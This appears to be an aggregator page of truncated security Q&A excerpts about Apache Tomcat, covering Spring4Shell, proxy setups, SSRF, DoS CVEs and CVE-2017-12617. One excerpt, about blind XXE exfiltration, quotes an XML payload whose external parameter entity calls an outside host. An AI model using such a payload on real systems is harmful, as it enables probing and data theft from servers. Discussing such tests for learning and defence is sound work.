spring4shell correction in tomcat
We use Tomcat, and version Tomcat 9.0.62 is supposed to fix the spring4shell vuln. To what extent is it the case? Are we safe not to upgrade to the latest Spring version?
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We use Tomcat, and version Tomcat 9.0.62 is supposed to fix the spring4shell vuln. To what extent is it the case? Are we safe not to upgrade to the latest Spring version?
I’m working with Tomcat and nginx as a reverse proxy and I’m trying to have a better understanding of how the traffic flows and of what the security issues are. Picture this as what I have in mind:
Tomcat and a webapp are installed on ser… Continue reading Encryption with Tomcat & Nginx reverse proxy
this is my first technical question in a non native language, so i’ll try to be clear as much as possible.
We need to deploy a Tomcat behind a F5 in a customer environment. The F5 basically translates packets from HTTPS to HTTP and send th… Continue reading Apache as proxy server between internal F5 and a Tomcat application [migrated]
I have a blind XXE through parameter entities. The payload I used to test it is the following.
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://myip"> %xxe; ]>
I receive a GET request. Next move I tried was serving thi… Continue reading Is it possible to exploit XXE data exfiltration with 1 GET request?
For July’s Nexus Intelligence Insight we take a deep dive into a Denial of Service (DoS) vulnerability impacting the popular Apache Tomcat Websocket component.
The post Nexus Intelligence Insights:CVE-2020-13935 – Apache Tomcat Websock… Continue reading Nexus Intelligence Insights:CVE-2020-13935 – Apache Tomcat Websocket – Denial of Service (DoS)
On my Debian web server running Tomcat with an Apache proxy, there was a sudden increase in CPU usage and disk operations. The resource overload caused the website to be very slow and eventually Tomcat automatically restarted to recover fr… Continue reading Sudden increase in resources, no heavy network traffic. What type of attack?
If I have a an application server that uses an implementation of JAX-RS, and is running as *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?
My naive understandin… Continue reading What measures can be taken to prevent Server Side Request Forgery (SSRF) in a JAX-RS Application running on Apache Tomcat?
I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talk about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.
Any Apache Tomcat server with enabled PUT request method will… Continue reading Vulnerable Apache Tomcat server
I would like to assess the actual risk for various CORS attacks when a web application properly sets CSP and other response headers, but the app server error page does not. When a 40x can be provoked by trying to access protected content, … Continue reading Security headers in application vs. Tomcat default 40x error
Does Apache Tomcat 9 meet PCI compliance?
From where I should start reading and gather some information about that topic?